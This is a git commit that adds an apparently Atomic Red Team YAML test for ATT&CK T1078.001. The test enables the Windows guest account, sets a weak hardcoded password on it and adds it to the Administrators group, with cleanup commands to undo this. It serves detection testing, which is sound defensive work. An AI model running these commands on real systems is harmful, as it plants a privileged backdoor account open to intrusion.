Create T1078.001 and yaml (#1178)
* Create T1078.001 and yaml Creating Folder for sub technique and yaml for .001 * Update T1078.001.yaml * Update T1078.001.yaml Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
Jesse Moore
@@ -0,0 +1,17 @@
|
||||
attack_technique: T1078.001
|
||||
display_name: 'Valid Accounts: Default Accounts'
|
||||
atomic_tests:
|
||||
- name: Enable Guest account
|
||||
description: After execution the Default Guest account will be enabled (Active) and added to Administrators Group
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: |
|
||||
net user guest /active:yes
|
||||
net user guest Paswword123!
|
||||
net localgroup administrators guest /add
|
||||
cleanup_command: |-
|
||||
net user guest /active:no
|
||||
net localgroup administrators guest /delete
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
Reference in New Issue
Block a user